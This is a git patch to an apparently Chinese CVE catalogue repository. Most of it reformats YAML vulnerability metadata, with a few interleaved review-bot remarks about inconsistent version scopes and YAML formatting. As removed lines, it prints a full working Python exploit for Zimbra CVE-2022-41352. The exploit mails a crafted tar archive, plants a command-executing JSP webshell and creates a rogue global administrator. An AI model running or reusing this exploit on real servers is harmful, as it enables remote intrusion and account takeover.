From bd0b5b8549046edfa0ede6fa61ef952996b5093b Mon Sep 17 00:00:00 2001 
From: lastre3et Date: Tue, 9 May 2023 11:29:52 +0800 Subject: [PATCH 1/2] Update All Yaml Files Format --- cve/Froxlor/2021/yaml/CVE-2021-42325.yaml | 5 +- cve/Froxlor/2023/yaml/CVE-2023-0315.yaml | 5 +- cve/Froxlor/2023/yaml/CVE-2023-0877.yaml | 5 +- cve/Grafana/2021/yaml/CVE-2021-43798.yaml | 2 +- cve/InfluxDB/2019/yaml/CVE-2019-20933.yaml | 4 +- cve/Java-SE/2022/yaml/CVE-2022-21449.yaml | 4 +- cve/WordPress/2019/yaml/CVE-2019-8942.yaml | 3 +- .../2022/CVE-2022-41352/cve-2022-41352.py | 236 ------------------ .../2022/yaml/CVE-2022-24112.yaml | 2 +- .../2022/yaml/CVE-2022-24706.yaml | 11 +- .../2019/yaml/CVE-2019-17564.yaml | 2 +- .../2021/yaml/CVE-2021-25641.yaml | 2 +- .../2021/yaml/CVE-2021-43297.yaml | 2 +- cve/apache-Httpd/2020/yaml/CVE-2020-9490.yaml | 3 +- .../2021/yaml/CVE-2021-41773.yaml | 2 +- .../2021/yaml/CVE-2021-42013.yaml | 4 +- .../2021/yaml/CVE-2021-26295.yaml | 1 - .../2022/yaml/CVE-2022-32532.yaml | 6 +- .../2017/yaml/CVE-2017-9805.yaml | 3 +- .../2018/yaml/CVE-2018-11776.yaml | 3 +- .../2019/yaml/CVE-2019-0230.yaml | 3 +- cve/apache-solr/2021/yaml/CVE-2021-27905.yaml | 11 +- .../2020/yaml/CVE-2020-13935.yaml | 2 +- .../2020/yaml/CVE-2020-1938.yaml | 2 +- .../2020/yaml/CVE-2020-9484.yaml | 2 +- .../2022/yaml/CVE-2022-29885.yaml | 2 +- .../2020/yaml/CVE-2020-13942.yaml | 3 +- cve/confluence/2019/yaml/CVE-2019-3394.yaml | 3 +- cve/confluence/2019/yaml/CVE-2019-3396.yaml | 4 +- cve/confluence/2021/yaml/CVE-2021-26084.yaml | 2 +- cve/confluence/2022/yaml/CVE-2022-26134.yaml | 2 +- cve/confluence/2022/yaml/CVE-2022-26138.yaml | 5 +- cve/django/2021/yaml/CVE-2021-31542.yaml | 3 +- cve/django/2022/yaml/CVE-2022-28346.yaml | 3 +- cve/django/2022/yaml/CVE-2022-34265.yaml | 3 +- .../2019/CVE-2019-16884/ReadMe.md | 0 .../2019/yaml/CVE-2019-16884.yaml | 10 +- cve/docker/2019/yaml/CVE-2019-5736.yaml | 4 +- cve/fortinac/2022/yaml/CVE-2022-39952.yaml | 2 +- cve/gitlab/2021/yaml/CVE-2021-22205.yaml | 2 +- cve/gitlab/2021/yaml/CVE-2021-22214.yaml | 2 +- 
cve/gitlab/2022/yaml/CVE-2022-1162.yaml | 2 +- .../2022/yaml/CVE-2022-22978.yaml | 5 +- cve/java-spring/2017/yaml/CVE-2017-8046.yaml | 5 +- cve/java-spring/2020/yaml/CVE-2020-5398.yaml | 5 +- cve/java-spring/2022/yaml/CVE-2022-22963.yaml | 3 +- cve/java-spring/2022/yaml/CVE-2022-22965.yaml | 3 +- cve/java-spring/2022/yaml/CVE-2022-31692.yaml | 3 +- cve/joomla/2023/yaml/CVE-2023-23752.yaml | 6 +- cve/libxml2/2020/yaml/CVE-2020-24977.yaml | 2 +- cve/libxml2/2021/yaml/CVE-2021-3517.yaml | 4 +- cve/libxml2/2021/yaml/CVE-2021-3518.yaml | 2 +- cve/libxml2/2021/yaml/CVE-2021-3537.yaml | 2 +- cve/linux-kernel/2011/yaml/CVE-2011-4916.yaml | 30 +-- cve/linux-kernel/2011/yaml/CVE-2011-4917.yaml | 30 +-- .../2019/yaml/CVE-2019-13272.yaml | 1 + .../2020/yaml/CVE-2020-12351.yaml | 2 +- .../2021/yaml/CVE-2021-22555.yaml | 8 +- .../2021/yaml/CVE-2021-26708.yaml | 4 +- .../2021/yaml/CVE-2021-29155.yaml | 2 +- .../2021/yaml/CVE-2021-33624.yaml | 6 +- .../2021/yaml/CVE-2021-33909.yaml | 4 +- cve/linux-kernel/2021/yaml/CVE-2021-3493.yaml | 10 +- cve/linux-kernel/2021/yaml/CVE-2021-4154.yaml | 2 + .../2021/yaml/CVE-2021-42008.yaml | 6 +- cve/linux-kernel/2021/yaml/CVE-2021-4204.yaml | 8 +- .../2021/yaml/CVE-2021-42327.yaml | 6 +- cve/linux-kernel/2022/CVE-2022-2602/README.md | 6 - cve/linux-kernel/2022/CVE-2022-2602/poc.c | 174 ------------- cve/linux-kernel/2022/yaml/CVE-2022-0185.yaml | 8 +- cve/linux-kernel/2022/yaml/CVE-2022-0435.yaml | 3 +- cve/linux-kernel/2022/yaml/CVE-2022-0492.yaml | 10 +- cve/linux-kernel/2022/yaml/CVE-2022-0847.yaml | 2 +- cve/linux-kernel/2022/yaml/CVE-2022-0995.yaml | 6 +- cve/linux-kernel/2022/yaml/CVE-2022-1015.yaml | 10 +- cve/linux-kernel/2022/yaml/CVE-2022-1679.yaml | 1 + .../2022/yaml/CVE-2022-23222.yaml | 4 +- .../2022/yaml/CVE-2022-24122.yaml | 2 +- .../2022/yaml/CVE-2022-25258.yaml | 3 +- .../2022/yaml/CVE-2022-25265.yaml | 6 +- .../2022/yaml/CVE-2022-25636.yaml | 6 +- cve/linux-kernel/2022/yaml/CVE-2022-2586.yaml | 4 +- 
cve/linux-kernel/2022/yaml/CVE-2022-2588.yaml | 6 +- cve/linux-kernel/2022/yaml/CVE-2022-2602.yaml | 19 -- cve/linux-kernel/2022/yaml/CVE-2022-2639.yaml | 62 ++--- .../2022/yaml/CVE-2022-27666.yaml | 7 +- .../2022/yaml/CVE-2022-32250.yaml | 6 +- .../2022/yaml/CVE-2022-34918.yaml | 2 +- ...VE-2022-36946.yaml => CVE-2022-36946.yaml} | 39 +-- .../2022/yaml/CVE-2022-41218.yaml | 4 +- cve/linux-kernel/2023/yaml/CVE-2023-0045.yaml | 19 +- cve/linux-kernel/2023/yaml/CVE-2023-0179.yaml | 6 +- cve/openssl/2016/yaml/CVE-2016-2107.yaml | 3 +- cve/openssl/2021/yaml/CVE-2021-3449.yaml | 3 +- cve/openssl/2022/yaml/CVE-2022-0778.yaml | 5 +- cve/openssl/2022/yaml/CVE-2022-2274.yaml | 2 +- cve/openssl/2022/yaml/CVE-2022-3602.yaml | 2 +- cve/openssl/2023/yaml/CVE-2023-25136.yaml | 2 +- cve/polkit/2021/yaml/CVE-2021-3560.yaml | 6 +- cve/polkit/2021/yaml/CVE-2021-4034.yaml | 4 +- cve/python/2022/yaml/CVE-2022-30286.yaml | 3 +- cve/python/2022/yaml/CVE-2022-35411.yaml | 3 +- cve/redis/2022/yaml/CVE-2022-0543.yaml | 5 +- cve/redis/2022/yaml/CVE-2022-31144.yaml | 3 +- cve/samba/2021/yaml/CVE-2021-44142.yaml | 5 +- cve/sudo/2021/yaml/CVE-2021-3156.yaml | 2 +- cve/sudo/2023/yaml/CVE-2023-22809.yaml | 33 ++- cve/vim/2021/yaml/CVE-2021-3778.yaml | 3 +- cve/vim/2022/yaml/CVE-2022-0351.yaml | 4 +- cve/vim/2022/yaml/CVE-2022-0359.yaml | 4 +- cve/vim/2022/yaml/CVE-2022-0413.yaml | 2 +- cve/vim/2022/yaml/CVE-2022-0417.yaml | 4 +- cve/vim/2022/yaml/CVE-2022-0572.yaml | 4 +- cve/vim/2022/yaml/CVE-2022-0629.yaml | 4 +- cve/vim/2022/yaml/CVE-2022-0685.yaml | 2 +- cve/vim/2022/yaml/CVE-2022-0714.yaml | 4 +- cve/vim/2022/yaml/CVE-2022-0729.yaml | 4 +- cve/vim/2022/yaml/CVE-2022-1771.yaml | 4 +- cve/vim/2022/yaml/CVE-2022-2206.yaml | 2 +- cve/vim/2022/yaml/CVE-2022-2257.yaml | 2 +- cve/vim/2022/yaml/CVE-2022-2264.yaml | 2 +- cve/vim/2022/yaml/CVE-2022-2598.yaml | 2 +- cve/vim/2023/yaml/CVE-2023-1127.yaml | 2 +- cve/webmin/2019/yaml/CVE-2019-12840.yaml | 2 +- cve/zabbix/2022/yaml/CVE-2022-23131.yaml | 3 
+- .../2022/yaml/KVE-2022-0231.yaml | 2 +- .../2022/yaml/KVE-2022-0206.yaml | 2 +- .../2022/yaml/KVE-2022-0207.yaml | 2 +- .../2022/yaml/KVE-2022-0210.yaml | 2 +- .../2022/yaml/KVE-2022-0205.yaml | 2 +- other_list.yaml | 1 - 131 files changed, 316 insertions(+), 781 deletions(-) delete mode 100644 cve/Zimbra/2022/CVE-2022-41352/cve-2022-41352.py rename cve/{linux-kernel => docker}/2019/CVE-2019-16884/ReadMe.md (100%) rename cve/{linux-kernel => docker}/2019/yaml/CVE-2019-16884.yaml (70%) delete mode 100644 cve/linux-kernel/2022/CVE-2022-2602/README.md delete mode 100644 cve/linux-kernel/2022/CVE-2022-2602/poc.c delete mode 100644 cve/linux-kernel/2022/yaml/CVE-2022-2602.yaml rename cve/linux-kernel/2022/yaml/{ CVE-2022-36946.yaml => CVE-2022-36946.yaml} (86%) diff --git a/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml b/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml index 7cd4ff5e..6e50fa41 100644 --- a/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml +++ b/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml @@ -1,6 +1,5 @@ id: CVE-2021-42325 -source: - https://www.exploit-db.com/exploits/50502 +source: https://www.exploit-db.com/exploits/50502 info: name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。 severity: high @@ -8,7 +7,7 @@ info: Froxlor是Froxlor团队的一套轻量级服务器管理软件。 Froxlor存在安全漏洞,该漏洞允许在数据库管理器DbManagerMySQL.php中通过自定义数据库名称注入SQL。 scope-of-influence: - Froxlor 0.9~0.10.30 + 0.9 < Froxlor < 0.10.30 reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-42325 - https://avd.aliyun.com/detail?id=AVD-2021-42325 diff --git a/cve/Froxlor/2023/yaml/CVE-2023-0315.yaml b/cve/Froxlor/2023/yaml/CVE-2023-0315.yaml index 5823536a..1dca795a 100644 --- a/cve/Froxlor/2023/yaml/CVE-2023-0315.yaml +++ b/cve/Froxlor/2023/yaml/CVE-2023-0315.yaml 
@@ -1,13 +1,12 @@
 id: CVE-2023-0315
-source:
- https://github.com/mhaskar/CVE-2023-0315
+source: https://github.com/mhaskar/CVE-2023-0315
 info:
 name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。
 severity: high
 description: |
 Froxlor 2.0.8 之前的版本存在远程代码执行漏洞。攻击者可以在未经身份验证的情况下利用这个漏洞在OS级别执行任意代码。
 scope-of-influence:
- Froxlor 2.0.8 之前的版本
+ Froxlor < 2.0.8
 reference:
 - https://nvd.nist.gov/vuln/detail/CVE-2023-0315
 - https://github.com/froxlor/froxlor/commit/090cfc26f2722ac3036cc7fd1861955bc36f065a
diff --git a/cve/Froxlor/2023/yaml/CVE-2023-0877.yaml b/cve/Froxlor/2023/yaml/CVE-2023-0877.yaml
index c65b99ea..792cb127 100644
--- a/cve/Froxlor/2023/yaml/CVE-2023-0877.yaml
+++ b/cve/Froxlor/2023/yaml/CVE-2023-0877.yaml
@@ -1,13 +1,12 @@
 id: CVE-2023-0877
-source:
- https://huntr.dev/bounties/b29cf038-06f1-4fb0-9437-08f2991f92a8/
+source: https://huntr.dev/bounties/b29cf038-06f1-4fb0-9437-08f2991f92a8/
 info:
 name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。
 severity: high
 description: |
 Code Injection in GitHub repository froxlor/froxlor prior to 2.0.11.
 scope-of-influence:
- Froxlor before 2.0.8
+ Froxlor < 2.0.8
 reference:
 - https://github.com/blakduk/Advisories
 - https://huntr.dev/bounties/b29cf038-06f1-4fb0-9437-08f2991f92a8/
diff --git a/cve/Grafana/2021/yaml/CVE-2021-43798.yaml b/cve/Grafana/2021/yaml/CVE-2021-43798.yaml
index 6580d144..79e07b15 100644
--- a/cve/Grafana/2021/yaml/CVE-2021-43798.yaml
+++ b/cve/Grafana/2021/yaml/CVE-2021-43798.yaml
@@ -10,7 +10,7 @@ info:
 reference:
 - https://grafana.com/blog/2021/12/08/an-update-on-0day-cve-2021-43798-grafana-directory-traversal/
 classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
 cvss-score: 7.5
 cve-id: CVE-2021-43798
 cwe-id: CWE-22
diff --git a/cve/InfluxDB/2019/yaml/CVE-2019-20933.yaml b/cve/InfluxDB/2019/yaml/CVE-2019-20933.yaml
index eaf35209..685d9c26 100644
--- a/cve/InfluxDB/2019/yaml/CVE-2019-20933.yaml
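Review bot: In the CVE-2023-0877 hunk the rewritten scope `Froxlor < 2.0.8` contradicts the description two lines above it, which says the code injection affects froxlor/froxlor prior to 2.0.11. The old text carried the same 2.0.8 figure, so the commit only restyles it, but a scope that ends several releases before the stated fix misleads anyone triaging from this file. Verify the fixed version against the huntr report referenced in the same file and make scope and description agree; if 2.0.11 is right the line should read `Froxlor < 2.0.11`.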
+++ b/cve/InfluxDB/2019/yaml/CVE-2019-20933.yaml
@@ -4,9 +4,9 @@ info:
 name: InfluxDB 1.7.6之前版本中的services/httpd/handler.go中的authenticate函数存在认证绕过漏洞。该漏洞源于JWT令牌可能具有空SharedSecret。攻击者可利用该漏洞绕过认证。
 severity: critical
 description: |
- InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret).
+ InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret).
 scope-of-influence:
- InfluxData InfluxDB <1.7.6
+ InfluxData InfluxDB < 1.7.6
 reference:
 - https://nvd.nist.gov/vuln/detail/CVE-2019-20933
 classification:
diff --git a/cve/Java-SE/2022/yaml/CVE-2022-21449.yaml b/cve/Java-SE/2022/yaml/CVE-2022-21449.yaml
index b95ffd9b..1d218dd7 100644
--- a/cve/Java-SE/2022/yaml/CVE-2022-21449.yaml
+++ b/cve/Java-SE/2022/yaml/CVE-2022-21449.yaml
@@ -4,7 +4,9 @@ info:
 name: Java SE(Java Standard Edition,Java 标准版)是Java技术的核心和基础,是Java ME和Java EE编程的基础。Java SE是Java程序设计语言和Java平台的总称。
 severity: high
 description: Oracle Java SE(组件:库)中存在漏洞。易被利用的漏洞允许未经身份验证的攻击者通过多种协议进行网络访问,从而危害Oracle Java SE、Oracle GraalVM Enterprise Edition。成功攻击此漏洞会导致对关键数据或所有Oracle Java SE、Oracle GraalVM Enterprise Edition可访问数据进行未经授权的创建、删除或修改访问。
- scope-of-influence: Oracle Java SE:17.0.2和18;Oracle GraalVM企业版:21.3.1和22.0.0.2
+ scope-of-influence:
+ Oracle Java SE:17.0.2和18
+ Oracle GraalVM企业版:21.3.1和22.0.0.2
 reference:
 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21449
 - https://security.netapp.com/advisory/ntap-20220429-0006/
diff --git a/cve/WordPress/2019/yaml/CVE-2019-8942.yaml b/cve/WordPress/2019/yaml/CVE-2019-8942.yaml
index 4223ef65..b0147978 100644
--- a/cve/WordPress/2019/yaml/CVE-2019-8942.yaml
+++ b/cve/WordPress/2019/yaml/CVE-2019-8942.yaml
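Review bot: The two lines added under `scope-of-influence:` in the CVE-2022-21449 hunk form a plain multi-line scalar, not two entries: a YAML loader folds them into the single string `Oracle Java SE:17.0.2和18 Oracle GraalVM企业版:21.3.1和22.0.0.2`, so the split is invisible to any consumer and the old `;` separator between the two products is lost. If the field is meant to be a list here, write `- Oracle Java SE:17.0.2和18` and `- Oracle GraalVM企业版:21.3.1和22.0.0.2`; if it is free text, keep it on one line or use a `|` block scalar as the `description` fields in the Froxlor and InfluxDB files already do.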
@@ -1,6 +1,5 @@ id: CVE-2019-8942 -source: - https://github.com/synacktiv/CVE-2019-8942 +source: https://github.com/synacktiv/CVE-2019-8942 info: name: WordPress是一款免费开源的内容管理系统(CMS),目前已经成为全球使用最多的CMS建站程序。 severity: high diff --git a/cve/Zimbra/2022/CVE-2022-41352/cve-2022-41352.py b/cve/Zimbra/2022/CVE-2022-41352/cve-2022-41352.py deleted file mode 100644 index d440f7e6..00000000 --- a/cve/Zimbra/2022/CVE-2022-41352/cve-2022-41352.py +++ /dev/null @@ -1,236 +0,0 @@ -#!/usr/bin/env python3 - -import sys -import smtplib -import argparse -from time import sleep -from email.mime.multipart import MIMEMultipart -from email.mime.application import MIMEApplication -from email.mime.text import MIMEText -import requests -from requests.packages.urllib3.exceptions import InsecureRequestWarning - -# CONFIGURATION -#---------------------------------- -TARGET = 'mail.test.org' -WEBSHELL_PATH = '/public/jsp' -WEBSHELL_NAME = 'Startup1_3.jsp' -ATTACHMENT = 'payload.tar' -SENDER = 'test@test.org' -RECIPIENT = 'admin@test.org' - -EMAIL_SUBJECT = 'CVE-2022-41352' -EMAIL_BODY = 'Just testing.

Don\'t mind me.

' -#---------------------------------- - -# Only change this if zimbra was not installed in the default location -UPLOAD_BASE = '/opt/zimbra/jetty_base/webapps/zimbra' - - -def create_tar_payload(payload, payload_name, payload_path, lnk='startup'): - # Block 1 - link = lnk.encode() - mode = b'0000777\x00' # link permissions - ouid = b'0001745\x00' # octal uid (997) - ogid = b'0001745\x00' # octal gid - lnsz = b'00000000000\x00' # file size (link = 0) - lmod = b'14227770134\x00' # last modified (octal unix) - csum = b' ' # checksum = 8 blanks - type = b'2' # type (link = 2) - targ = payload_path.encode() # link target - magi = b'ustar \x00' # ustar magic bytes + version - ownu = b'zimbra' # user owner - owng = b'zimbra' # group owner - vers = b'\x00'*8 + b'\x00'* 8 # device major and minor - pref = b'\x00'*155 # prefix (only used if the file name length exceeds 100) - - raw_b1_1 = link + b'\x00'*(100-len(link)) + mode + ouid + ogid + lnsz + lmod - raw_b1_2 = type + targ + b'\x00'*(100-len(targ)) + magi + ownu + b'\x00'*(32-len(ownu)) + owng + b'\x00'*(32-len(owng)) + vers + pref - # calculate and insert checksum - csum = oct(sum(b for b in raw_b1_1+csum+raw_b1_2))[2:] - raw_b1 = raw_b1_1 + f'{csum:>07}'.encode() + b'\x00' + raw_b1_2 - # pad block to 512 - raw_b1 += b'\00'*(512-len(raw_b1)) - - # Block 2 - mode = b'0000644\x00' # file permissions - file = f'{lnk}/{payload_name}'.encode() - flsz = oct(len(payload))[2:] # file size - csum = b' ' # checksum = 8 blanks - type = b'0' # type (file = 0) - targ = b'\x00'*100 # link target = none - - raw_b2_1 = file + b'\x00'*(100-len(file)) + mode + ouid + ogid + f'{flsz:>011}'.encode() + b'\x00' + lmod - raw_b2_2 = type + targ + magi + ownu + b'\x00'*(32-len(ownu)) + owng + b'\x00'*(32-len(owng)) + vers + pref - # calculate and insert checksum - csum = oct(sum(b for b in raw_b2_1+csum+raw_b2_2))[2:] - raw_b2 = raw_b2_1 + f'{csum:>07}'.encode() + b'\x00' + raw_b2_2 - # pad block to 512 - raw_b2 += b'\00'*(512-len(raw_b2)) - 
- - # Assemble - raw_tar = raw_b1 + raw_b2 + payload + b'\x00'*(512-(len(payload)%512)) - raw_tar += b'\x00' * 512 * 2 # Trailer: end with 2 empty blocks - - return raw_tar - -# Update this if you want to use a legit email account for sending the payload -def smtp_send_file(target, sender, recipient, subject, body, attachment, attachment_name): - msg = MIMEMultipart() - msg['Subject'] = subject - msg['From'] = sender - msg['To'] = recipient - - message = MIMEText(body, 'html') - msg.attach(message) - - att = MIMEApplication(attachment) - att.add_header('Content-Disposition', 'attachment', filename=attachment_name) - msg.attach(att) - - try: - print(f'>>> Sending payload') - smtp_server = smtplib.SMTP(target,25) - smtp_server.sendmail(sender, recipient, msg.as_string()) - print(f'>>> Payload delivered') - except Exception as e: - print(f'[!] Failed to send the mail: {e}') - sys.exit(1) - -def verify_upload(target, shell, path): - print(f'>>> Verifying upload to {path}/{shell} ...') - sleep(5) # give the server time to process the email - resp = requests.get(f'https://{target}{path}/{shell}', verify=False) - if resp.status_code == 200: - print(f'>>> [PWNED] Upload successful!') - else: - print(f'>>> Upload unsuccesful :(') - sys.exit(1) - -def create_new_zimbra_admin(target, shell, path): - url = f'https://{target}' - pw = 'Pwn1ng_Z1mbra_!s_fun' - print(f'>>> Adding a new global administrator') - if (input(f'>>> Are you sure you want to continue? 
(yN): ') != 'y'): - sys.exit(0) - admin = input(f'>>> Enter the new admin email (newadmin@domain.com): ') - r = requests.get(f'{url}/{path}/{shell}?task=/opt/zimbra/bin/zmprov ca {admin} {pw}', verify=False) - r = requests.get(f'{url}/{path}/{shell}?task=/opt/zimbra/bin/zmprov ma {admin} zimbraIsAdminAccount TRUE', verify=False) - - print(f'>>> Login to {url}:7071/zimbraAdmin/ with:') - print(f'>>> Email : {admin}') - print(f'>>> Password : {pw}') - - -def main(args): - global TARGET,WEBSHELL_PATH,WEBSHELL_NAME,ATTACHMENT,SENDER,RECIPIENT,EMAIL_SUBJECT,EMAIL_BODY - - # Kali JSP WebShell - payload = b'
<%@ page import="java.io.*" %><% String cmd=request.getParameter("task");String output="";if(cmd!=null){String s=null;try {Process p=Runtime.getRuntime().exec(cmd);BufferedReader sI=new BufferedReader(new InputStreamReader(p.getInputStream()));while((s = sI.readLine())!=null){output+=s;}}catch(IOException e){e.printStackTrace();}} %>
<%=output %>
' - - # Using this instead of argparse default values to allow easy manual configuration as well - if args.payload: - try: - with open(args.payload, 'rb') as f: - payload = f.read() - except Exception as e: - print(f'Failed to read {args.payload}: {e}') - sys.exit(1) - print(f'>>> Using custom payload from: {args.payload}') - else: - print(f'>>> Using default payload: JSP Webshell') - if args.path: - WEBSHELL_PATH = args.path - if args.file: - WEBSHELL_NAME = args.file - if args.attach: - ATTACHMENT = args.attach - - tar = create_tar_payload(payload, WEBSHELL_NAME, UPLOAD_BASE+WEBSHELL_PATH) - - print(f'>>> Assembled payload attachment: {ATTACHMENT}') - print(f'>>> Payload will be extracted to ({UPLOAD_BASE}){WEBSHELL_PATH}/{WEBSHELL_NAME}') - if args.mode == 'manual': - with open(ATTACHMENT, 'wb') as f: - f.write(tar) - print(f'>>> Attachment saved locally.') - sys.exit(0) - - if args.target: - TARGET = args.target - - print(f'>>> Targeting {TARGET}') - - if args.sender: - SENDER = args.sender - if args.recip: - RECIPIENT = args.recip - if args.subject: - EMAIL_SUBJECT = args.subject - if args.body: - try: - with open(args.body, 'rb') as f: - EMAIL_BODY = f.read().decode() - except Exception as e: - print(f'Failed to read {args.body}: {e}') - sys.exit(1) - print(f'>>> Using custom email body from: {args.body}') - - - smtp_send_file( TARGET, - SENDER, - RECIPIENT, - EMAIL_SUBJECT, - EMAIL_BODY, - tar, - ATTACHMENT ) - - requests.packages.urllib3.disable_warnings(InsecureRequestWarning) - - verify_upload(TARGET, WEBSHELL_NAME, WEBSHELL_PATH) - - print(f'>>> Shell at: https://{TARGET}{WEBSHELL_PATH}/{WEBSHELL_NAME}') - if args.mode == 'auto': - sys.exit(0) - - if args.payload: - print(f'>>> (!) 
"fullpwn" depends on the default JSP webshell - won\'t create the admin account') - else: - create_new_zimbra_admin(TARGET, WEBSHELL_NAME, WEBSHELL_PATH) - - sys.exit(0) - -if __name__ == '__main__': - epi = ''' -Alternatively, edit the script to change the default configuration. - -The available modes are: - - manual : Only create the payload - you have to deploy the payload yourself. - auto : Create a webshell and deploy it via SMTP. - fullpwn : After deploying a webshell, add a new global mail administrator. -''' - - p = argparse.ArgumentParser( - description = 'CVE-2022-41352 Zimbra RCE', - formatter_class = argparse.RawDescriptionHelpFormatter, - epilog = epi - ) - p.add_argument('mode', metavar='mode', choices=['manual', 'auto', 'fullpwn'], help='(manual|auto|fullpwn) - see below') - - p.add_argument('--target', required=False, metavar='', dest='target', help=f'the target server (default: "{TARGET}")') - p.add_argument('--payload', required=False, metavar='', help='the file to save on the target (default: jsp webshell)') - p.add_argument('--path', required=False, metavar='', help=f'relative path for the file upload (default: "{WEBSHELL_PATH}")') - p.add_argument('--file', required=False, metavar='', help=f'name of the uploaded file (default: "{WEBSHELL_NAME}")') - p.add_argument('--attach', required=False, metavar='', help=f'name of the email attachment containing the payload (default: "{ATTACHMENT}")') - p.add_argument('--sender', required=False, metavar='', help=f'sender mail address (default: "{SENDER}")') - p.add_argument('--recip', required=False, metavar='', help=f'recipient mail address (default: "{RECIPIENT}") (if you can deploy the email directly to the server, neither the sender nor the recipient have to exist for the exploit to work)') - p.add_argument('--subject', required=False, metavar='', help=f'subject to use in the email (default: "{EMAIL_SUBJECT}")') - p.add_argument('--body', required=False, metavar='', help=f'file containing the html 
content for the email body (default: "{EMAIL_BODY}")') - - args = p.parse_args() - - main(args) diff --git a/cve/apache-Apsix/2022/yaml/CVE-2022-24112.yaml b/cve/apache-Apsix/2022/yaml/CVE-2022-24112.yaml index 883d103f..a70bb457 100644 --- a/cve/apache-Apsix/2022/yaml/CVE-2022-24112.yaml +++ b/cve/apache-Apsix/2022/yaml/CVE-2022-24112.yaml @@ -11,7 +11,7 @@ info: - https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2022-24112 cwe-id: CWE-290 cnvd-id: None diff --git a/cve/apache-CouchDB/2022/yaml/CVE-2022-24706.yaml b/cve/apache-CouchDB/2022/yaml/CVE-2022-24706.yaml index 50fd5093..f1346b55 100644 --- a/cve/apache-CouchDB/2022/yaml/CVE-2022-24706.yaml +++ b/cve/apache-CouchDB/2022/yaml/CVE-2022-24706.yaml @@ -8,8 +8,8 @@ info: scope-of-influence: apache-CouchDB < 3.2.2 reference: - - http://packetstormsecurity.com/files/167032/Apache-CouchDB-3.2.1-Remote-Code-... - - http://packetstormsecurity.com/files/169702/Apache-CouchDB-Erlang-Remote-Code... + - http://packetstormsecurity.com/files/167032/Apache-CouchDB-3.2.1-Remote-Code-Execution.html + - http://packetstormsecurity.com/files/169702/Apache-CouchDB-Erlang-Remote-Code-Execution.html - http://www.openwall.com/lists/oss-security/2022/04/26/1 - http://www.openwall.com/lists/oss-security/2022/05/09/1 - http://www.openwall.com/lists/oss-security/2022/05/09/2 @@ -17,7 +17,7 @@ info: - http://www.openwall.com/lists/oss-security/2022/05/09/4 - https://docs.couchdb.org/en/3.2.2/setup/cluster.html - https://lists.apache.org/thread/w24wo0h8nlctfps65txvk0oc5hdcnv00 - - https://medium.com/@_sadshade/couchdb-erlang-and-cookies-rce-on-default-setti... + - https://medium.com/@_sadshade/couchdb-erlang-and-cookies-rce-on-default-settings-b1e9173a4bcd - https://www.openwall.com/lists/oss-security/2022/04/26/1 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 
@@ -26,7 +26,4 @@ info:
 cwe-id: CWE-1188
 cnvd-id: None
 kve-id: None
- tags:
- - 不安全的默认资源初始化
- - 弱口令要求
- - 远程代码执行
\ No newline at end of file
+ tags: 不安全的默认资源初始化, 弱口令要求, 远程代码执行
\ No newline at end of file
diff --git a/cve/apache-Dubbo/2019/yaml/CVE-2019-17564.yaml b/cve/apache-Dubbo/2019/yaml/CVE-2019-17564.yaml
index 2ae19468..f467401d 100644
--- a/cve/apache-Dubbo/2019/yaml/CVE-2019-17564.yaml
+++ b/cve/apache-Dubbo/2019/yaml/CVE-2019-17564.yaml
@@ -12,7 +12,7 @@ info:
 reference:
 - https://nvd.nist.gov/vuln/detail/CVE-2019-17564
 classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
 cvss-score: 9.8
 cve-id: CVE-2019-17564
 cwe-id: CWE-502
diff --git a/cve/apache-Dubbo/2021/yaml/CVE-2021-25641.yaml b/cve/apache-Dubbo/2021/yaml/CVE-2021-25641.yaml
index faf28d8b..2a64f8c3 100644
--- a/cve/apache-Dubbo/2021/yaml/CVE-2021-25641.yaml
+++ b/cve/apache-Dubbo/2021/yaml/CVE-2021-25641.yaml
@@ -11,7 +11,7 @@ info:
 reference:
 - https://nvd.nist.gov/vuln/detail/CVE-2021-25641
 classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
 cvss-score: 9.8
 cve-id: CVE-2021-25641
 cwe-id: CWE-502
diff --git a/cve/apache-Dubbo/2021/yaml/CVE-2021-43297.yaml b/cve/apache-Dubbo/2021/yaml/CVE-2021-43297.yaml
index 1ba752b3..dacaa277 100644
--- a/cve/apache-Dubbo/2021/yaml/CVE-2021-43297.yaml
+++ b/cve/apache-Dubbo/2021/yaml/CVE-2021-43297.yaml
@@ -11,7 +11,7 @@ info:
 - https://help.aliyun.com/document_detail/390193.html
 - https://lists.apache.org/thread/1mszxrvp90y01xob56yp002939c7hlww
 classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
 cvss-score: 9.8
 cve-id: CVE-2021-43297
 cwe-id: CWE-502
